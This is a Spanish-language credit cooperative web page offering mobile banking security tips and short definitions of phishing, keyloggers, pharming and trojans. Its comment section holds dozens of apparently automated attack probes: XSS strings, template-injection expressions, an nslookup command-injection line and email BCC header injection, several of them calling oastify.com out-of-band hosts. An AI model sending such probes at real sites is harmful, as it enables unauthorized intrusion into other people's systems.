¡Hola soy Luisa,
escríbeme!

Seguridad

Seguridad en Aplicaciones Móviles

  • Seguridad en Aplicaciones Móviles 
  1. Descargue la APP únicamente a través de Google Play o APP Store, en donde la encontraras como: LC virtual
  2. Para acceder a la APP Móvil se le solicitará la clave y usuario de acceso de la cooperativa Virtual (la que
    utiliza a través de la página web).
  3. Al efectuar transacciones se le enviará un código de seguridad (OTP) a su número celular y correo electrónico registrado en la Cooperativa.
  4. Es responsabilidad del socio/usuario que tenga su información actualizada en la Cooperativa, con el fin de que toda notificación de transacción realizada a través de canales electrónicos pueda ser conocida de inmediato a través de mensajes de texto a su número celular y correo electrónico.
  5. Recuerde que la cooperativa no solicita contraseñas de correo electrónico, dispositivos móviles o medio de uso personal por ningún medio.
  6. Si se registra 3 intentos de ingreso fallidos a su cuenta con claves incorrectas, el sistema procede a bloquear el acceso. Para desbloquear el dispositivo deberá ingresar en el botón «Cuenta bloqueada» y seguir los pasos indicados.
  7. Le recordamos que su clave de acceso y el celular son parte de tus bienes personales por tanto su prolijo cuidado y uso es su responsabilidad.
  8. Al terminar el uso de nuestro sistema Virtual y APP Móvil es necesario que cierre la sesión, para evitar inconvenientes.
  9. Cooperativa de ahorro y crédito se reserva el derecho de modificar, suspender o interrumpir el
    servicio del aplicativo móvil o parte de este, no obstante, informará a los socios a través de redes
    sociales o página web de dicha decisión
 

 CONSEJOS DE PREVENCIÓN

Le brindamos una lista de las amenazas más frecuentes:

 • Phishing. – Zonas que falsifican sitios corporativos legítimos con el objetivo de obtener información confidencial financiera, u otro tipo de información de los usuarios. 

• Bot. – Aplicaciones relacionadas, que se han infiltrado en las computadoras de los usuarios con fines maliciosos, por ejemplo, acceso remoto o robo de información. 

• Keylogger. – Programas que se ejecutan de fondo y registran todos los movimientos del teclado, y que pueden enviar dicha información posiblemente contraseñas o información confidencial a un tercero externo. 

• Software Malicioso. – Diseñado por una persona externa para atacar o manipular la máquina o la red, ya sea para causar daño, utilizar información y recursos en forma no autorizada. 

• Spyware. – Software utilizado para registrar e informar sobre la actividad de una computadora de escritorio sin el conocimiento del usuario, excluye hardware y cookies. 

• Pharming. – Es la explotación de una vulnerabilidad en el software de los servidores DNS (Domain Name System) o en el de los equipos de los propios usuarios, que permite a un atacante redirigir un nombre de dominio (domain name) a otra máquina distinta. De esta forma un usuario que introduzca un determinado nombre de dominio que haya sido redirigido, accederá en su explorador de internet a la página web que el atacante haya especificado para ese nombre de dominio. 

• Troyanos. – Los troyanos son programas maliciosos que están disfrazados como algo atractivo que invitan al usuario a ejecutarlo ocultando un software malicioso. Este software puede tener un efecto inmediato y consecuencias indeseables, por ejemplo, borrar los archivos del usuario, instalar programas indeseables o maliciosos.

 

45 Replies to “Seguridad en Aplicaciones Móviles”

  1. karla dice:

    prueba

  2. rmtqhccxsl dice:

    Muchas gracias. ?Como puedo iniciar sesion?

  3. Anónimo dice:

    Comentario *

  4. Anónimo dice:

    Comentario *’

  5. Anónimo dice:

    Comentario *”

  6. Anónimo dice:

    l499j05s0v

  7. Anónimo dice:

    Comentario *4l1z0a7319

  8. Anónimo dice:

    Comentario *alert(1)

  9. Anónimo dice:

    Comentario *crig66yppf><

  10. Anónimo dice:

    Comentario *crig66yppf%3e%3c

  11. Anónimo dice:

    alert(1)

  12. Anónimo dice:

    wbc3nrciie><

  13. Anónimo dice:

    wbc3nrciie%3e%3c

  14. Anónimo dice:

    mysd5#{518*609}v38dh

  15. Anónimo dice:

    kaov0[[124*829]]eb730

  16. Anónimo dice:

    ufz7r%{777*588}v9ebe

  17. Anónimo dice:

    vsnst5e5u5p0a092g5ft

  18. Anónimo dice:

    o0ppijsgc4%4185bphed0ij

  19. Anónimo dice:

    3jdtpqlten\\l9n83xna8o

  20. Anónimo dice:

    pys8y8p9yaApm2hnhpr60

  21. Anónimo dice:

    Comentario *c09jv3fs3w9f92py4igd

  22. Anónimo dice:

    Comentario *f4rn2c22s6%418myiy9jkb9

  23. Anónimo dice:

    Comentario *28f9zh0dg8\\lsp4y5o44x

  24. Anónimo dice:

    Comentario *fpcfxou4jgAqtpcy41394

  25. Anónimo dice:

    tnkdxe7i2yj0eqdfmx71ygospjvcjcf07ozbpze.oastify.com

  26. Anónimo dice:

    nslookup -q=cname ykmiuj4nz3g5bvakj246vllxmoshghc558t0gq4f.oastify.com.&

  27. Anónimo dice:

    Comentario *
    BCC:tspd2eci7yo0jqifrxc13gtsuj0cock0ct0lnbb0@oastify.com
    emg: l

  28. Anónimo dice:

    Comentario *>
    BCC:sd9cndxhsx9z4p3ecwx0oferfilb9b5zxtll8bw0@oastify.com
    dci: c

  29. Anónimo dice:

    %{3284*8041}

  30. Anónimo dice:

    3762*331

  31. Anónimo dice:

    730m”vasv

  32. Anónimo dice:

    @(9112*6642)

  33. Anónimo dice:

    xz340fkvu57yyb9q74wrtqv

  34. Anónimo dice:

    hhx16wlxf3`z’z”${{%{{\

  35. Anónimo dice:

    z6fer0pj15\z`z’z”${{%{{\

  36. Anónimo dice:

    hb9ylzit6

  37. vomtrtscr1 dice:

    Comentario *

  38. alert(1) dice:

    Comentario *

  39. g52urr1li5> dice:

    Comentario *

  40. g52urr1li5 dice:

    Comentario *

  41. eyjui#{901*126}thlc8 dice:

    Comentario *

  42. k0k3g[[504*612]]he4y9 dice:

    Comentario *

  43. ib6ar%{198*820}rje31 dice:

    Comentario *

  44. }}k5fbu'/" dice:

    Comentario *

  45. %}tuglk'/" dice:

    Comentario *

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Close Search Window